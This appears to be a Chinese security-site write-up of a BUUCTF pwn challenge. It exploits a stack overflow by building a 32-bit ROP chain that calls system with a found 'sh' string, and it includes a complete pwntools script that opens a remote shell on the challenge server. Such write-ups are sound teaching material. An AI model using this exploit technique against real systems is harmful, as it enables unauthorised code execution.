仅有 sh ROP!!!

04915

仅有 sh ROP

话不多说,直接上题(BUUCTF)

仅有 sh ROP!!!-侠者安全社区

反编译代码要先输入 administrator 通过验证

其中有三个选项以及一个隐藏选项

仅有 sh ROP!!!-侠者安全社区

先看隐藏选项,它将 src 值给了 dest 最后打印

仅有 sh ROP!!!-侠者安全社区

在第一个选项中发现这个 src 值是有我们决定的最多 128 字节

仅有 sh ROP!!!-侠者安全社区

看 dest 缓冲区明显存在栈溢出,同时左边 plt 表中有 system 函数可直接调用

仅有 sh ROP!!!-侠者安全社区

但是在字符串表中并未找到 /bin/sh

仅有 sh ROP!!!-侠者安全社区

/bin/sh 参数可以使用 sh 代替,使用工具 ROPgadget 看能不能查找到

仅有 sh ROP!!!-侠者安全社区

既然有那就构造 payload

from pwn import *

p = remote('node5.buuoj.cn',26585)

system = 0x080484d0
sh = 0x080482ea
main = 0x08048722

p.recvuntil('password:')
p.sendline('administrator')
p.recvuntil('Exit\n:')
p.sendline(str(1))
p.recvuntil('info:')

payload = b'a' * 0x4c + p32(system) + p32(main) + p32(sh)
p.sendline(payload)

p.recvuntil('Exit\n:')
p.sendline(str(4))
p.interactive()

成功拿到 flag

 

© 版权声明
版权声明 1、本站唯一名称: 侠者安全社区
2、本站永久网址:https://www.xiasec.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长VXfreek0x00进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。

THE END
二进制安全
喜欢就支持一下吧
点赞15 分享
雾島风起時的头像 - 侠者安全社区
Gets 栈溢出(堆栈平衡) - 侠者安全社区
Gets 栈溢出(堆栈平衡)
Gets 栈溢出(堆栈平衡)
5天前 52
Gets 栈溢出(变量覆盖) - 侠者安全社区
Gets 栈溢出(变量覆盖)
Gets 栈溢出(变量覆盖)
5天前 42
Csu Execve ROP - 侠者安全社区
Csu Execve ROP
Csu Execve ROP
5天前 37
32 位栈迁移 ROP - 侠者安全社区
32 位栈迁移 ROP
32 位栈迁移 ROP
5天前 37
Read 栈溢出 - 侠者安全社区
Read 栈溢出
Read 栈溢出
5天前 33
Gets 栈溢出 - 侠者安全社区
Gets 栈溢出
Gets 栈溢出
5天前 32
相关推荐
测试2 - 侠者安全社区
测试2
测试2
1年前 84
Gets 栈溢出(堆栈平衡) - 侠者安全社区
Gets 栈溢出(堆栈平衡)
Gets 栈溢出(堆栈平衡)
5天前 52
仅有 sh ROP!!! - 侠者安全社区
仅有 sh ROP!!!
仅有 sh ROP!!!
5天前 49
Gets 栈溢出(变量覆盖) - 侠者安全社区
Gets 栈溢出(变量覆盖)
Gets 栈溢出(变量覆盖)
5天前 42
32 位栈迁移 ROP - 侠者安全社区
32 位栈迁移 ROP
32 位栈迁移 ROP
5天前 37
Csu Execve ROP - 侠者安全社区
Csu Execve ROP
Csu Execve ROP
5天前 37
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
快捷回复
谢谢你的分享,我从中学到了很多!
教程很好用,谢谢!
好东西,学习一下!
楼主听话,快到碗里来!
路过一下,我只是来打酱油的!
水帖美如花,养护靠大家!

    暂无评论内容

默认头像
Windows PE结构 之 开篇上 - 侠者安全社区
466人已阅读
Windows PE结构 之 开篇上
TOP1
C++ 轻量级命令行解析库 cmdline - 侠者安全社区
C++ 轻量级命令行解析库 cmdline
1年前433人已阅读
TOP2
测试8 - 侠者安全社区
测试8
1年前421人已阅读
TOP3
测试6 - 侠者安全社区
测试6
1年前319人已阅读
TOP4
WEB TOP10 之 SQL注入漏洞 MySQL (二) - 侠者安全社区
WEB TOP10 之 SQL注入漏洞 MySQL (二)
11个月前308人已阅读
TOP5
WEB TOP10 之 文件上传漏洞 利用 - 侠者安全社区
WEB TOP10 之 文件上传漏洞 利用
11个月前303人已阅读
TOP6
标签云
注册表文件上传数据外带Win32WAFSQL注入SQLMAPshellcodePythonPE结构GoDll注入CryptoppC#C/C++#栈溢出#Pwn
用户63893722的头像 - 侠者安全社区

用户6389372211个月前0

666666
tools的头像 - 侠者安全社区荣誉会员

tools徽章-资深玩家 - 侠者安全社区11个月前0

表情[se] - 侠者安全社区
用户63013253的头像 - 侠者安全社区荣誉会员

用户63013253徽章-初出茅庐 - 侠者安全社区12个月前0

表情[zhayanjian] - 侠者安全社区
tools的头像 - 侠者安全社区荣誉会员

tools徽章-资深玩家 - 侠者安全社区12个月前0

表情[jie] - 侠者安全社区
xiaoxiao的头像 - 侠者安全社区

xiaoxiao徽章-资深玩家 - 侠者安全社区1年前1

不错啊!!!
Y_LOGO的头像 - 侠者安全社区荣誉会员

Y_LOGO徽章-初出茅庐 - 侠者安全社区1年前0

表情[qiang] - 侠者安全社区